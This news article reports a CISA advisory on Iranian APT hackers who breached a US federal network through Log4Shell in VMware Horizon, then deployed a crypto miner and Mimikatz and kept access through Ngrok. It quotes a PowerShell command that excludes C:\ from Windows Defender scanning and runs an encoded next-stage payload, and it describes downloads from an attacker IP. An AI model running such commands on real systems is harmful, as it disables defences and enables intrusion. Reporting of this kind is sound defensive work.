U.S Federal Network Hacked – APT Hackers Gained Access to the Domain Controller

U.S Cyber security infrastructure and security Agency uncovered a potential cyber attack on the U.S Federal network where attackers compromised the organization’s DC and possibly deployed crypto Miner, credential Harvester.

Iranian APT hackers launched an attack on Federal Civilian Executive Branch (FCEB) organization by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server.


CVE-2021-44228 (log4Shell) was a zero-day vulnerability in Log4j, a popular Java logging framework involving arbitrary code execution, and affects a wide range of products, including the VMware Horizon.

CISA believes that the attack was initiated by Iran government-backed hackers who install XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence.

On April 2022, CISA conduct a routine investigation and suspected malicious APT activities on the FCEB network with the help of  EINSTEIN—an FCEB-wide intrusion detection system (IDS).

APT Activities Investigation

During the investigation, researchers found bi-directional traffic between the network and a known malicious IP address associated with the exploitation of the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon servers.

As a result, there was an HTTPS activity initiated from IP address 51.89.181[.]64 to the organization’s VMware server, further in-depth analysis reveals that the IP associated with Lightweight Directory Access Protocol (LDAP) server that was operated by threat actors to deploying Log4Shell.

“Following HTTPS activity, CISA observed a suspected LDAP callback on port 443 to this IP address. CISA also observed a DNS query for us‐nation‐ny[.]cf that resolved back to 51.89.181[.]64 when the victim server was returning this Log4Shell LDAP callback to the actors’ server.” said in the CISA report.

Researchers also found an LDAP callback to the IP 51.89.181[.]64 on port 443, upon successful exploitation of the Log4Shell vulnerability, threat actors compromised the Domain Controller.

Technical Analysis

Iranian APT threat actors initially found an unpatched VMware Horizon server that was deployed by the organization, and established a connection from malicious IP address 182.54.217[.]2 lasting 17.6 seconds.

In order to evade the Windows defender detection, attackers added the exclusion rule to WD using the following PowerShell commands:

powershell try{Add-MpPreference -ExclusionPath ‘C:\’; Write-Host ‘added-exclusion’} catch {Write-Host ‘adding-exclusion-failed’ }; powershell -enc “$BASE64 encoded payload to download next stage and execute it”

Adding the exclusion rule, attackers escape from the virus scan and download the further tools to the c:\drive.

Later a C2 server communication will be established and exploit payload then downloaded mdeploy.text from 182.54.217[.]2/mdepoy.txt  to C:\users\public\mde.ps1.

Soon after it downloads the file.zip from 182.54.217[.]2, mde.ps1 will be wiped out from the disk to reduce the risk of being caught by the AV engine.

When the researchers dug deep into the file, file.zip carried a crypto-mining software and also downloaded around 30 megabytes of files from transfer[.]sh server that contains the following tools.

  • PsExec – a Microsoft signed tool for system administrators.
  • Mimikatz – a credential theft tool.
  • Ngrok – a reverse proxy tool

The Mimikatz tool was used against the VDI-KMS to harvest credentials and created a rogue domain administrator account through which attackers leverage the RDP and gain control over several hosts within the network.

Later they manually disabled the Windows defender with the help of GUI and eventually implanted Ngrok executables and configuration files.

“The threat actors were able to implant Ngrok on multiple hosts to ensure Ngrok’s persistence should they lose access to a machine during a routine reboot.”

Soon after the attackers established a deep foothold on the network, attackers executed the PowerShell command on the active directory to gain access to all the machines associated with the domain, and this operation was successfully performed at a lateral moment after they gained the Domain Controller access.

Finally, threat actors have changed the local administrator password as a backup if the rogue domain admin access is detected and terminated.

Threat Actor Tactics and Techniques

Here is the complete attack TTPs used by APT hackers in the massive cyber attack.

  • Initial Access – Exploit Public – Facing Application – Actors exploited the Log4Shell bug on the VMware Horizon server
  • Execution – PowerShell, a Command and Scripting Interpreter – actors executed PowerShell on the AD to obtain a list of machines on the domain.
  • Persistence – Account Manipulation, Create Account: Local Account, Create Account: Domain Account, Scheduled Task/Job: Scheduled Task.
  • Evasion Detection – Impair Defenses: Disable or Modify Tools, Indicator Removal on Host: File Deletion.
  • Credential Access – OS Credential Dumping: LSASS Memory, Credentials from Password Stores.
  • Discovery – Remote System Discovery – PowerShell command on the AD to obtain a list of all machines.
  • Lateral Movement – Remote Services: Remote Desktop Protocol to gain access to multiple hosts on the network.
  • Command and Control – Ngrok to proxy RDP connections and to perform command and control.
  • Ingress Tool Transfer – downloaded malware and multiple tools to the network, including PsExec, Mimikatz, and Ngrok.


CISA & FBI advised all organizations to immediately apply available patches and follow the mitigations:

  1. Install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.
  2. Keep all software up to date
  3. Minimize the internet-facing attack surface
  4. Use best practices for identity and access management (IAM)
  5. Audit domain controllers to log 
  6. Create a deny list of known compromised credentials
  7. Secure credentials by restricting where accounts and credentials can be used.

Biggest BlackFriday Cyber Sale!! Learn 100+ Advanced Cyber Security Courses Online

Apply $100 Discount Coupon: BlackFriday2022

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.